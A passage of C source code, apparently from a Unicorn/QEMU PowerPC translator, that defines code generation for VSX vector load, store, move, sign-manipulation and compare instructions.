return; \ } \ } \ EA = tcg_temp_new(tcg_ctx); \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ gen_set_access_type(ctx, ACCESS_INT); \ gen_addr_register(ctx, EA); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, EA, xt, cpu_gpr[rB(ctx->opcode)]); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_ptr(tcg_ctx, xt); \ } VSX_VECTOR_LOAD_STORE_LENGTH(lxvl) VSX_VECTOR_LOAD_STORE_LENGTH(lxvll) VSX_VECTOR_LOAD_STORE_LENGTH(stxvl) VSX_VECTOR_LOAD_STORE_LENGTH(stxvll) #endif #define VSX_LOAD_SCALAR_DS(name, operation) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 xth; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ xth = tcg_temp_new_i64(tcg_ctx); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0x03); \ gen_qemu_##operation(ctx, xth, EA); \ set_cpu_vsrh(tcg_ctx, rD(ctx->opcode) + 32, xth); \ /* NOTE: cpu_vsrl is undefined */ \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, xth); \ } VSX_LOAD_SCALAR_DS(lxsd, ld64_i64) VSX_LOAD_SCALAR_DS(lxssp, ld32fs) #define VSX_STORE_SCALAR(name, operation) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ get_cpu_vsrh(tcg_ctx, t0, xS(ctx->opcode)); \ gen_qemu_##operation(ctx, t0, EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } VSX_STORE_SCALAR(stxsdx, st64_i64) VSX_STORE_SCALAR(stxsibx, st8_i64) VSX_STORE_SCALAR(stxsihx, st16_i64) VSX_STORE_SCALAR(stxsiwx, st32_i64) VSX_STORE_SCALAR(stxsspx, st32fs) static void gen_stxvd2x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } t0 = tcg_temp_new_i64(tcg_ctx); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); get_cpu_vsrh(tcg_ctx, t0, xS(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); get_cpu_vsrl(tcg_ctx, t0, xS(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_stxvw4x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xsh; TCGv_i64 xsl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xsh = tcg_temp_new_i64(tcg_ctx); xsl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xsh, xS(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xsl, xS(ctx->opcode)); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); if (ctx->le_mode) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t0, xsh, 32); tcg_gen_deposit_i64(tcg_ctx, t1, t0, xsh, 32, 32); tcg_gen_qemu_st_i64(tcg_ctx, t1, EA, ctx->mem_idx, MO_LEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_shri_i64(tcg_ctx, t0, xsl, 32); tcg_gen_deposit_i64(tcg_ctx, t1, t0, xsl, 32, 32); tcg_gen_qemu_st_i64(tcg_ctx, t1, EA, ctx->mem_idx, MO_LEQ); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } else { tcg_gen_qemu_st_i64(tcg_ctx, xsh, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_st_i64(tcg_ctx, xsl, EA, ctx->mem_idx, MO_BEQ); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xsh); tcg_temp_free_i64(tcg_ctx, xsl); } static void gen_stxvh8x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xsh; TCGv_i64 xsl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xsh = tcg_temp_new_i64(tcg_ctx); xsl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xsh, xS(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xsl, xS(ctx->opcode)); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); if (ctx->le_mode) { TCGv_i64 outh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 outl = tcg_temp_new_i64(tcg_ctx); gen_bswap16x8(tcg_ctx, outh, outl, xsh, xsl); tcg_gen_qemu_st_i64(tcg_ctx, outh, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_st_i64(tcg_ctx, outl, EA, ctx->mem_idx, MO_BEQ); tcg_temp_free_i64(tcg_ctx, outh); tcg_temp_free_i64(tcg_ctx, outl); } else { tcg_gen_qemu_st_i64(tcg_ctx, xsh, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_st_i64(tcg_ctx, xsl, EA, ctx->mem_idx, MO_BEQ); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xsh); tcg_temp_free_i64(tcg_ctx, xsl); } static void gen_stxvb16x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 xsh; TCGv_i64 xsl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xsh = tcg_temp_new_i64(tcg_ctx); xsl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xsh, xS(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xsl, xS(ctx->opcode)); gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); tcg_gen_qemu_st_i64(tcg_ctx, xsh, EA, ctx->mem_idx, MO_BEQ); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); tcg_gen_qemu_st_i64(tcg_ctx, xsl, EA, ctx->mem_idx, MO_BEQ); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, xsh); tcg_temp_free_i64(tcg_ctx, xsl); } #define VSX_STORE_SCALAR_DS(name, operation) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 xth; \ \ if (unlikely(!ctx->altivec_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VPU); \ return; \ } \ xth = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xth, rD(ctx->opcode) + 32); \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0x03); \ gen_qemu_##operation(ctx, xth, EA); \ /* NOTE: cpu_vsrl is undefined */ \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, xth); \ } VSX_STORE_SCALAR_DS(stxsd, st64_i64) VSX_STORE_SCALAR_DS(stxssp, st32fs) static void gen_mfvsrwz(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 xsh = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xsh, xS(ctx->opcode)); tcg_gen_ext32u_i64(tcg_ctx, tmp, xsh); tcg_gen_trunc_i64_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], tmp); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, xsh); } static void gen_mtvsrwa(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 xsh = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, tmp, cpu_gpr[rA(ctx->opcode)]); tcg_gen_ext32s_i64(tcg_ctx, xsh, tmp); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xsh); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, xsh); } static void gen_mtvsrwz(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 xsh = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, tmp, cpu_gpr[rA(ctx->opcode)]); tcg_gen_ext32u_i64(tcg_ctx, xsh, tmp); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xsh); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, xsh); } #if defined(TARGET_PPC64) static void gen_mfvsrd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } t0 = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, t0, xS(ctx->opcode)); tcg_gen_mov_i64(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_mtvsrd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_mfvsrld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } t0 = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrl(tcg_ctx, t0, xS(ctx->opcode)); tcg_gen_mov_i64(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_mtvsrdd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (xT(ctx->opcode) < 32) { if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } t0 = tcg_temp_new_i64(tcg_ctx); if (!rA(ctx->opcode)) { tcg_gen_movi_i64(tcg_ctx, t0, 0); } else { tcg_gen_mov_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); } set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); tcg_gen_mov_i64(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)]); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), t0); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_mtvsrws(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (xT(ctx->opcode) < 32) { if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_deposit_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], 32, 32); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), t0); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif static void gen_xxpermdi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xh, xl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xh = tcg_temp_new_i64(tcg_ctx); xl = tcg_temp_new_i64(tcg_ctx); if (unlikely((xT(ctx->opcode) == xA(ctx->opcode)) || (xT(ctx->opcode) == xB(ctx->opcode)))) { if ((DM(ctx->opcode) & 2) == 0) { get_cpu_vsrh(tcg_ctx, xh, xA(ctx->opcode)); } else { get_cpu_vsrl(tcg_ctx, xh, xA(ctx->opcode)); } if ((DM(ctx->opcode) & 1) == 0) { get_cpu_vsrh(tcg_ctx, xl, xB(ctx->opcode)); } else { get_cpu_vsrl(tcg_ctx, xl, xB(ctx->opcode)); } set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xh); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xl); } else { if ((DM(ctx->opcode) & 2) == 0) { get_cpu_vsrh(tcg_ctx, xh, xA(ctx->opcode)); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xh); } else { get_cpu_vsrl(tcg_ctx, xh, xA(ctx->opcode)); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xh); } if ((DM(ctx->opcode) & 1) == 0) { get_cpu_vsrh(tcg_ctx, xl, xB(ctx->opcode)); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xl); } else { get_cpu_vsrl(tcg_ctx, xl, xB(ctx->opcode)); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xl); } } tcg_temp_free_i64(tcg_ctx, xh); tcg_temp_free_i64(tcg_ctx, xl); } #define OP_ABS 1 #define OP_NABS 2 #define OP_NEG 3 #define OP_CPSGN 4 #define SGN_MASK_DP 0x8000000000000000ull #define SGN_MASK_SP 0x8000000080000000ull #define VSX_SCALAR_MOVE(name, op, sgn_mask) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 xb, sgm; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xb = tcg_temp_new_i64(tcg_ctx); \ sgm = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xb, xB(ctx->opcode)); \ tcg_gen_movi_i64(tcg_ctx, sgm, sgn_mask); \ switch (op) { \ case OP_ABS: { \ tcg_gen_andc_i64(tcg_ctx, xb, xb, sgm); \ break; \ } \ case OP_NABS: { \ tcg_gen_or_i64(tcg_ctx, xb, xb, sgm); \ break; \ } \ case OP_NEG: { \ tcg_gen_xor_i64(tcg_ctx, xb, xb, sgm); \ break; \ } \ case OP_CPSGN: { \ TCGv_i64 xa = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xa, xA(ctx->opcode)); \ tcg_gen_and_i64(tcg_ctx, xa, xa, sgm); \ tcg_gen_andc_i64(tcg_ctx, xb, xb, sgm); \ tcg_gen_or_i64(tcg_ctx, xb, xb, xa); \ tcg_temp_free_i64(tcg_ctx, xa); \ break; \ } \ } \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xb); \ tcg_temp_free_i64(tcg_ctx, xb); \ tcg_temp_free_i64(tcg_ctx, sgm); \ } VSX_SCALAR_MOVE(xsabsdp, OP_ABS, SGN_MASK_DP) VSX_SCALAR_MOVE(xsnabsdp, OP_NABS, SGN_MASK_DP) VSX_SCALAR_MOVE(xsnegdp, OP_NEG, SGN_MASK_DP) VSX_SCALAR_MOVE(xscpsgndp, OP_CPSGN, SGN_MASK_DP) #define VSX_SCALAR_MOVE_QP(name, op, sgn_mask) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ int xa; \ int xt = rD(ctx->opcode) + 32; \ int xb = rB(ctx->opcode) + 32; \ TCGv_i64 xah, xbh, xbl, sgm, tmp; \ \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xbh = tcg_temp_new_i64(tcg_ctx); \ xbl = tcg_temp_new_i64(tcg_ctx); \ sgm = tcg_temp_new_i64(tcg_ctx); \ tmp = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xbh, xb); \ get_cpu_vsrl(tcg_ctx, xbl, xb); \ tcg_gen_movi_i64(tcg_ctx, sgm, sgn_mask); \ switch (op) { \ case OP_ABS: \ tcg_gen_andc_i64(tcg_ctx, xbh, xbh, sgm); \ break; \ case OP_NABS: \ tcg_gen_or_i64(tcg_ctx, xbh, xbh, sgm); \ break; \ case OP_NEG: \ tcg_gen_xor_i64(tcg_ctx, xbh, xbh, sgm); \ break; \ case OP_CPSGN: \ xah = tcg_temp_new_i64(tcg_ctx); \ xa = rA(ctx->opcode) + 32; \ get_cpu_vsrh(tcg_ctx, tmp, xa); \ tcg_gen_and_i64(tcg_ctx, xah, tmp, sgm); \ tcg_gen_andc_i64(tcg_ctx, xbh, xbh, sgm); \ tcg_gen_or_i64(tcg_ctx, xbh, xbh, xah); \ tcg_temp_free_i64(tcg_ctx, xah); \ break; \ } \ set_cpu_vsrh(tcg_ctx, xt, xbh); \ set_cpu_vsrl(tcg_ctx, xt, xbl); \ tcg_temp_free_i64(tcg_ctx, xbl); \ tcg_temp_free_i64(tcg_ctx, xbh); \ tcg_temp_free_i64(tcg_ctx, sgm); \ tcg_temp_free_i64(tcg_ctx, tmp); \ } VSX_SCALAR_MOVE_QP(xsabsqp, OP_ABS, SGN_MASK_DP) VSX_SCALAR_MOVE_QP(xsnabsqp, OP_NABS, SGN_MASK_DP) VSX_SCALAR_MOVE_QP(xsnegqp, OP_NEG, SGN_MASK_DP) VSX_SCALAR_MOVE_QP(xscpsgnqp, OP_CPSGN, SGN_MASK_DP) #define VSX_VECTOR_MOVE(name, op, sgn_mask) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 xbh, xbl, sgm; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xbh = tcg_temp_new_i64(tcg_ctx); \ xbl = tcg_temp_new_i64(tcg_ctx); \ sgm = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); \ get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); \ tcg_gen_movi_i64(tcg_ctx, sgm, sgn_mask); \ switch (op) { \ case OP_ABS: { \ tcg_gen_andc_i64(tcg_ctx, xbh, xbh, sgm); \ tcg_gen_andc_i64(tcg_ctx, xbl, xbl, sgm); \ break; \ } \ case OP_NABS: { \ tcg_gen_or_i64(tcg_ctx, xbh, xbh, sgm); \ tcg_gen_or_i64(tcg_ctx, xbl, xbl, sgm); \ break; \ } \ case OP_NEG: { \ tcg_gen_xor_i64(tcg_ctx, xbh, xbh, sgm); \ tcg_gen_xor_i64(tcg_ctx, xbl, xbl, sgm); \ break; \ } \ case OP_CPSGN: { \ TCGv_i64 xah = tcg_temp_new_i64(tcg_ctx); \ TCGv_i64 xal = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xah, xA(ctx->opcode)); \ get_cpu_vsrl(tcg_ctx, xal, xA(ctx->opcode)); \ tcg_gen_and_i64(tcg_ctx, xah, xah, sgm); \ tcg_gen_and_i64(tcg_ctx, xal, xal, sgm); \ tcg_gen_andc_i64(tcg_ctx, xbh, xbh, sgm); \ tcg_gen_andc_i64(tcg_ctx, xbl, xbl, sgm); \ tcg_gen_or_i64(tcg_ctx, xbh, xbh, xah); \ tcg_gen_or_i64(tcg_ctx, xbl, xbl, xal); \ tcg_temp_free_i64(tcg_ctx, xah); \ tcg_temp_free_i64(tcg_ctx, xal); \ break; \ } \ } \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xbh); \ set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xbl); \ tcg_temp_free_i64(tcg_ctx, xbh); \ tcg_temp_free_i64(tcg_ctx, xbl); \ tcg_temp_free_i64(tcg_ctx, sgm); \ } VSX_VECTOR_MOVE(xvabsdp, OP_ABS, SGN_MASK_DP) VSX_VECTOR_MOVE(xvnabsdp, OP_NABS, SGN_MASK_DP) VSX_VECTOR_MOVE(xvnegdp, OP_NEG, SGN_MASK_DP) VSX_VECTOR_MOVE(xvcpsgndp, OP_CPSGN, SGN_MASK_DP) VSX_VECTOR_MOVE(xvabssp, OP_ABS, SGN_MASK_SP) VSX_VECTOR_MOVE(xvnabssp, OP_NABS, SGN_MASK_SP) VSX_VECTOR_MOVE(xvnegsp, OP_NEG, SGN_MASK_SP) VSX_VECTOR_MOVE(xvcpsgnsp, OP_CPSGN, SGN_MASK_SP) #define VSX_CMP(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 ignored; \ TCGv_ptr xt, xa, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ xa = gen_vsr_ptr(tcg_ctx, xA(ctx->opcode)); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ if ((ctx->opcode >> (31 - 21)) & 1) { \ gen_helper_##name(tcg_ctx, cpu_crf[6], tcg_ctx->cpu_env, xt, xa, xb); \ } else { \ ignored = tcg_temp_new_i32(tcg_ctx); \ gen_helper_##name(tcg_ctx, ignored, tcg_ctx->cpu_env, xt, xa, xb); \ tcg_temp_free_i32(tcg_ctx, ignored); \ } \ gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } VSX_CMP(xvcmpeqdp, 0x0C, 0x0C, 0, PPC2_VSX) VSX_CMP(xvcmpgedp, 0x0C, 0x0E, 0, PPC2_VSX) VSX_CMP(xvcmpgtdp, 0x0C, 0x0D, 0, PPC2_VSX) VSX_CMP(xvcmpnedp, 0x0C, 0x0F, 0, PPC2_ISA300) VSX_CMP(xvcmpeqsp, 0x0C, 0x08, 0, PPC2_VSX) VSX_CMP(xvcmpgesp, 0x0C, 0x0A, 0, PPC2_VSX) VSX_CMP(xvcmpgtsp, 0x0C, 0x09, 0, PPC2_VSX) VSX_CMP(xvcmpnesp, 0x0C, 0x0B, 0, PPC2_VSX) static void gen_xscvqpdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 opc; TCGv_ptr xt, xb; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } opc = tcg_const_i32(tcg_ctx, ctx->opcode); xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); gen_helper_xscvqpdp(tcg_ctx, tcg_ctx->cpu_env, opc, xt, xb); tcg_temp_free_i32(tcg_ctx, opc); tcg_temp_free_ptr(tcg_ctx, xt); tcg_temp_free_ptr(tcg_ctx, xb); } #define GEN_VSX_HELPER_2(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc); \ tcg_temp_free_i32(tcg_ctx, opc); \ } #define GEN_VSX_HELPER_X3(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr xt, xa, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ xa = gen_vsr_ptr(tcg_ctx, xA(ctx->opcode)); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, xt, xa, xb); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_X2(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr xt, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, xt, xb); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_X2_AB(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ TCGv_ptr xa, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ xa = gen_vsr_ptr(tcg_ctx, xA(ctx->opcode)); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc, xa, xb); \ tcg_temp_free_i32(tcg_ctx, opc); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_X1(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ TCGv_ptr xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc, xb); \ tcg_temp_free_i32(tcg_ctx, opc); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_R3(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ TCGv_ptr xt, xa, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ xt = gen_vsr_ptr(tcg_ctx, rD(ctx->opcode) + 32); \ xa = 